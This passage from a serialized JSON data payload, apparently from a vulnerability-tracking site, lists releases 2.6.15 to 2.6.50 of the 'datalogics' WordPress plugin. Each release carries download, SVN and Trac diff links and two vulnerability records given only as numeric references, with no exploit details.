2.6.50\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fdatalogics%2Ftags%2F2.6.49&new_path=%2Fdatalogics%2Ftags%2F2.6.50",[783,784],{"id":106,"url_slug":107,"title":108,"severity":39,"cvss_score":40,"vuln_type":112,"patched_in_version":111},{"id":32,"url_slug":33,"title":34,"severity":39,"cvss_score":40,"vuln_type":42,"patched_in_version":38},{"version":786,"download_url":787,"svn_tag_url":788,"released_at":36,"has_diff":118,"diff_files_changed":789,"diff_lines":36,"trac_diff_url":790,"vulnerabilities":791,"is_current":118},"2.6.49","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdatalogics.2.6.49.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fdatalogics\u002Ftags\u002F2.6.49\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fdatalogics%2Ftags%2F2.6.48&new_path=%2Fdatalogics%2Ftags%2F2.6.49",[792,793],{"id":106,"url_slug":107,"title":108,"severity":39,"cvss_score":40,"vuln_type":112,"patched_in_version":111},{"id":32,"url_slug":33,"title":34,"severity":39,"cvss_score":40,"vuln_type":42,"patched_in_version":38},{"version":795,"download_url":796,"svn_tag_url":797,"released_at":36,"has_diff":118,"diff_files_changed":798,"diff_lines":36,"trac_diff_url":799,"vulnerabilities":800,"is_current":118},"2.6.48","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdatalogics.2.6.48.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fdatalogics\u002Ftags\u002F2.6.48\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fdatalogics%2Ftags%2F2.6.47&new_path=%2Fdatalogics%2Ftags%2F2.6.48",[801,802],{"id":106,"url_slug":107,"title":108,"severity":39,"cvss_score":40,"vuln_type":112,"patched_in_version":111},{"id":32,"url_slug":33,"title":34,"severity":39,"cvss_score":40,"vuln_type":42,"patched_in_version":38},{"version":804,"download_url":805,"svn_tag_url":806,"released_at":36,"has_diff":118,"diff_files_changed":807,"diff_lines":36,"trac_diff_url":808,"vulnerabilities":809,"is_current":118},"2.6.47","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdatalogics.2.6.47.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fdatalogics\u002Ftags\u002F2.6.47\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fdatalogics%2Ftags%2F2.6.44&new_path=%2Fdatalogics%2Ftags%2F2.6.47",[810,811],{"id":106,"url_slug":107,"title":108,"severity":39,"cvss_score":40,"vuln_type":112,"patched_in_version":111},{"id":32,"url_slug":33,"title":34,"severity":39,"cvss_score":40,"vuln_type":42,"patched_in_version":38},{"version":813,"download_url":814,"svn_tag_url":815,"released_at":36,"has_diff":118,"diff_files_changed":816,"diff_lines":36,"trac_diff_url":817,"vulnerabilities":818,"is_current":118},"2.6.44","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdatalogics.2.6.44.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fdatalogics\u002Ftags\u002F2.6.44\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fdatalogics%2Ftags%2F2.6.43&new_path=%2Fdatalogics%2Ftags%2F2.6.44",[819,820],{"id":106,"url_slug":107,"title":108,"severity":39,"cvss_score":40,"vuln_type":112,"patched_in_version":111},{"id":32,"url_slug":33,"title":34,"severity":39,"cvss_score":40,"vuln_type":42,"patched_in_version":38},{"version":822,"download_url":823,"svn_tag_url":824,"released_at":36,"has_diff":118,"diff_files_changed":825,"diff_lines":36,"trac_diff_url":826,"vulnerabilities":827,"is_current":118},"2.6.43","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdatalogics.2.6.43.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fdatalogics\u002Ftags\u002F2.6.43\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fdatalogics%2Ftags%2F2.6.42&new_path=%2Fdatalogics%2Ftags%2F2.6.43",[828,829],{"id":106,"url_slug":107,"title":108,"severity":39,"cvss_score":40,"vuln_type":112,"patched_in_version":111},{"id":32,"url_slug":33,"title":34,"severity":39,"cvss_score":40,"vuln_type":42,"patched_in_version":38},{"version":831,"download_url":832,"svn_tag_url":833,"released_at":36,"has_diff":118,"diff_files_changed":834,"diff_lines":36,"trac_diff_url":835,"vulnerabilities":836,"is_current":118},"2.6.42","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdatalogics.2.6.42.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fdatalogics\u002Ftags\u002F2.6.42\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fdatalogics%2Ftags%2F2.6.41&new_path=%2Fdatalogics%2Ftags%2F2.6.42",[837,838],{"id":106,"url_slug":107,"title":108,"severity":39,"cvss_score":40,"vuln_type":112,"patched_in_version":111},{"id":32,"url_slug":33,"title":34,"severity":39,"cvss_score":40,"vuln_type":42,"patched_in_version":38},{"version":840,"download_url":841,"svn_tag_url":842,"released_at":36,"has_diff":118,"diff_files_changed":843,"diff_lines":36,"trac_diff_url":844,"vulnerabilities":845,"is_current":118},"2.6.41","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdatalogics.2.6.41.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fdatalogics\u002Ftags\u002F2.6.41\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fdatalogics%2Ftags%2F2.6.40&new_path=%2Fdatalogics%2Ftags%2F2.6.41",[846,847],{"id":106,"url_slug":107,"title":108,"severity":39,"cvss_score":40,"vuln_type":112,"patched_in_version":111},{"id":32,"url_slug":33,"title":34,"severity":39,"cvss_score":40,"vuln_type":42,"patched_in_version":38},{"version":849,"download_url":850,"svn_tag_url":851,"released_at":36,"has_diff":118,"diff_files_changed":852,"diff_lines":36,"trac_diff_url":853,"vulnerabilities":854,"is_current":118},"2.6.40","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdatalogics.2.6.40.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fdatalogics\u002Ftags\u002F2.6.40\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fdatalogics%2Ftags%2F2.6.37&new_path=%2Fdatalogics%2Ftags%2F2.6.40",[855,856],{"id":106,"url_slug":107,"title":108,"severity":39,"cvss_score":40,"vuln_type":112,"patched_in_version":111},{"id":32,"url_slug":33,"title":34,"severity":39,"cvss_score":40,"vuln_type":42,"patched_in_version":38},{"version":858,"download_url":859,"svn_tag_url":860,"released_at":36,"has_diff":118,"diff_files_changed":861,"diff_lines":36,"trac_diff_url":862,"vulnerabilities":863,"is_current":118},"2.6.37","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdatalogics.2.6.37.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fdatalogics\u002Ftags\u002F2.6.37\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fdatalogics%2Ftags%2F2.6.35&new_path=%2Fdatalogics%2Ftags%2F2.6.37",[864,865],{"id":106,"url_slug":107,"title":108,"severity":39,"cvss_score":40,"vuln_type":112,"patched_in_version":111},{"id":32,"url_slug":33,"title":34,"severity":39,"cvss_score":40,"vuln_type":42,"patched_in_version":38},{"version":867,"download_url":868,"svn_tag_url":869,"released_at":36,"has_diff":118,"diff_files_changed":870,"diff_lines":36,"trac_diff_url":871,"vulnerabilities":872,"is_current":118},"2.6.35","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdatalogics.2.6.35.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fdatalogics\u002Ftags\u002F2.6.35\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fdatalogics%2Ftags%2F2.6.33&new_path=%2Fdatalogics%2Ftags%2F2.6.35",[873,874],{"id":106,"url_slug":107,"title":108,"severity":39,"cvss_score":40,"vuln_type":112,"patched_in_version":111},{"id":32,"url_slug":33,"title":34,"severity":39,"cvss_score":40,"vuln_type":42,"patched_in_version":38},{"version":876,"download_url":877,"svn_tag_url":878,"released_at":36,"has_diff":118,"diff_files_changed":879,"diff_lines":36,"trac_diff_url":880,"vulnerabilities":881,"is_current":118},"2.6.33","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdatalogics.2.6.33.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fdatalogics\u002Ftags\u002F2.6.33\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fdatalogics%2Ftags%2F2.6.32&new_path=%2Fdatalogics%2Ftags%2F2.6.33",[882,883],{"id":106,"url_slug":107,"title":108,"severity":39,"cvss_score":40,"vuln_type":112,"patched_in_version":111},{"id":32,"url_slug":33,"title":34,"severity":39,"cvss_score":40,"vuln_type":42,"patched_in_version":38},{"version":885,"download_url":886,"svn_tag_url":887,"released_at":36,"has_diff":118,"diff_files_changed":888,"diff_lines":36,"trac_diff_url":889,"vulnerabilities":890,"is_current":118},"2.6.32","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdatalogics.2.6.32.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fdatalogics\u002Ftags\u002F2.6.32\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fdatalogics%2Ftags%2F2.6.31&new_path=%2Fdatalogics%2Ftags%2F2.6.32",[891,892],{"id":106,"url_slug":107,"title":108,"severity":39,"cvss_score":40,"vuln_type":112,"patched_in_version":111},{"id":32,"url_slug":33,"title":34,"severity":39,"cvss_score":40,"vuln_type":42,"patched_in_version":38},{"version":894,"download_url":895,"svn_tag_url":896,"released_at":36,"has_diff":118,"diff_files_changed":897,"diff_lines":36,"trac_diff_url":898,"vulnerabilities":899,"is_current":118},"2.6.31","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdatalogics.2.6.31.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fdatalogics\u002Ftags\u002F2.6.31\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fdatalogics%2Ftags%2F2.6.30&new_path=%2Fdatalogics%2Ftags%2F2.6.31",[900,901],{"id":106,"url_slug":107,"title":108,"severity":39,"cvss_score":40,"vuln_type":112,"patched_in_version":111},{"id":32,"url_slug":33,"title":34,"severity":39,"cvss_score":40,"vuln_type":42,"patched_in_version":38},{"version":903,"download_url":904,"svn_tag_url":905,"released_at":36,"has_diff":118,"diff_files_changed":906,"diff_lines":36,"trac_diff_url":907,"vulnerabilities":908,"is_current":118},"2.6.30","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdatalogics.2.6.30.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fdatalogics\u002Ftags\u002F2.6.30\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fdatalogics%2Ftags%2F2.6.29&new_path=%2Fdatalogics%2Ftags%2F2.6.30",[909,910],{"id":106,"url_slug":107,"title":108,"severity":39,"cvss_score":40,"vuln_type":112,"patched_in_version":111},{"id":32,"url_slug":33,"title":34,"severity":39,"cvss_score":40,"vuln_type":42,"patched_in_version":38},{"version":912,"download_url":913,"svn_tag_url":914,"released_at":36,"has_diff":118,"diff_files_changed":915,"diff_lines":36,"trac_diff_url":916,"vulnerabilities":917,"is_current":118},"2.6.29","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdatalogics.2.6.29.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fdatalogics\u002Ftags\u002F2.6.29\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fdatalogics%2Ftags%2F2.6.28&new_path=%2Fdatalogics%2Ftags%2F2.6.29",[918,919],{"id":106,"url_slug":107,"title":108,"severity":39,"cvss_score":40,"vuln_type":112,"patched_in_version":111},{"id":32,"url_slug":33,"title":34,"severity":39,"cvss_score":40,"vuln_type":42,"patched_in_version":38},{"version":921,"download_url":922,"svn_tag_url":923,"released_at":36,"has_diff":118,"diff_files_changed":924,"diff_lines":36,"trac_diff_url":925,"vulnerabilities":926,"is_current":118},"2.6.28","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdatalogics.2.6.28.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fdatalogics\u002Ftags\u002F2.6.28\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fdatalogics%2Ftags%2F2.6.27&new_path=%2Fdatalogics%2Ftags%2F2.6.28",[927,928],{"id":106,"url_slug":107,"title":108,"severity":39,"cvss_score":40,"vuln_type":112,"patched_in_version":111},{"id":32,"url_slug":33,"title":34,"severity":39,"cvss_score":40,"vuln_type":42,"patched_in_version":38},{"version":930,"download_url":931,"svn_tag_url":932,"released_at":36,"has_diff":118,"diff_files_changed":933,"diff_lines":36,"trac_diff_url":934,"vulnerabilities":935,"is_current":118},"2.6.27","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdatalogics.2.6.27.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fdatalogics\u002Ftags\u002F2.6.27\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fdatalogics%2Ftags%2F2.6.23&new_path=%2Fdatalogics%2Ftags%2F2.6.27",[936,937],{"id":106,"url_slug":107,"title":108,"severity":39,"cvss_score":40,"vuln_type":112,"patched_in_version":111},{"id":32,"url_slug":33,"title":34,"severity":39,"cvss_score":40,"vuln_type":42,"patched_in_version":38},{"version":939,"download_url":940,"svn_tag_url":941,"released_at":36,"has_diff":118,"diff_files_changed":942,"diff_lines":36,"trac_diff_url":943,"vulnerabilities":944,"is_current":118},"2.6.23","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdatalogics.2.6.23.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fdatalogics\u002Ftags\u002F2.6.23\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fdatalogics%2Ftags%2F2.6.22&new_path=%2Fdatalogics%2Ftags%2F2.6.23",[945,946],{"id":106,"url_slug":107,"title":108,"severity":39,"cvss_score":40,"vuln_type":112,"patched_in_version":111},{"id":32,"url_slug":33,"title":34,"severity":39,"cvss_score":40,"vuln_type":42,"patched_in_version":38},{"version":948,"download_url":949,"svn_tag_url":950,"released_at":36,"has_diff":118,"diff_files_changed":951,"diff_lines":36,"trac_diff_url":952,"vulnerabilities":953,"is_current":118},"2.6.22","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdatalogics.2.6.22.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fdatalogics\u002Ftags\u002F2.6.22\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fdatalogics%2Ftags%2F2.6.21&new_path=%2Fdatalogics%2Ftags%2F2.6.22",[954,955],{"id":106,"url_slug":107,"title":108,"severity":39,"cvss_score":40,"vuln_type":112,"patched_in_version":111},{"id":32,"url_slug":33,"title":34,"severity":39,"cvss_score":40,"vuln_type":42,"patched_in_version":38},{"version":957,"download_url":958,"svn_tag_url":959,"released_at":36,"has_diff":118,"diff_files_changed":960,"diff_lines":36,"trac_diff_url":961,"vulnerabilities":962,"is_current":118},"2.6.21","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdatalogics.2.6.21.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fdatalogics\u002Ftags\u002F2.6.21\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fdatalogics%2Ftags%2F2.6.20&new_path=%2Fdatalogics%2Ftags%2F2.6.21",[963,964],{"id":106,"url_slug":107,"title":108,"severity":39,"cvss_score":40,"vuln_type":112,"patched_in_version":111},{"id":32,"url_slug":33,"title":34,"severity":39,"cvss_score":40,"vuln_type":42,"patched_in_version":38},{"version":966,"download_url":967,"svn_tag_url":968,"released_at":36,"has_diff":118,"diff_files_changed":969,"diff_lines":36,"trac_diff_url":970,"vulnerabilities":971,"is_current":118},"2.6.20","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdatalogics.2.6.20.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fdatalogics\u002Ftags\u002F2.6.20\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fdatalogics%2Ftags%2F2.6.18&new_path=%2Fdatalogics%2Ftags%2F2.6.20",[972,973],{"id":106,"url_slug":107,"title":108,"severity":39,"cvss_score":40,"vuln_type":112,"patched_in_version":111},{"id":32,"url_slug":33,"title":34,"severity":39,"cvss_score":40,"vuln_type":42,"patched_in_version":38},{"version":975,"download_url":976,"svn_tag_url":977,"released_at":36,"has_diff":118,"diff_files_changed":978,"diff_lines":36,"trac_diff_url":979,"vulnerabilities":980,"is_current":118},"2.6.18","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdatalogics.2.6.18.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fdatalogics\u002Ftags\u002F2.6.18\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fdatalogics%2Ftags%2F2.6.16&new_path=%2Fdatalogics%2Ftags%2F2.6.18",[981,982],{"id":106,"url_slug":107,"title":108,"severity":39,"cvss_score":40,"vuln_type":112,"patched_in_version":111},{"id":32,"url_slug":33,"title":34,"severity":39,"cvss_score":40,"vuln_type":42,"patched_in_version":38},{"version":984,"download_url":985,"svn_tag_url":986,"released_at":36,"has_diff":118,"diff_files_changed":987,"diff_lines":36,"trac_diff_url":988,"vulnerabilities":989,"is_current":118},"2.6.16","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdatalogics.2.6.16.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fdatalogics\u002Ftags\u002F2.6.16\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fdatalogics%2Ftags%2F2.6.15&new_path=%2Fdatalogics%2Ftags%2F2.6.16",[990,991],{"id":106,"url_slug":107,"title":108,"severity":39,"cvss_score":40,"vuln_type":112,"patched_in_version":111},{"id":32,"url_slug":33,"title":34,"severity":39,"cvss_score":40,"vuln_type":42,"patched_in_version":38},{"version":993,"download_url":994,"svn_tag_url":995,"released_at":36,"has_diff":118,"diff_files_changed":996,"diff_lines":36,"trac_diff_url":36,"vulnerabilities":997,"is_current":118},"2.6.15","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdatalogics.2.6.15.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fdatalogics\u002Ftags\u002F2.6.15\u002F",[],[998,999],{"id":106,"url_slug":107,"title":108,"severity":39,"cvss_score":40,"vuln_type":112,"patched_in_version":111},{"id":32,"url_slug":33,"title":34,"severity":39,"cvss_score":40,"vuln_type":42,"patched_in_version":38}]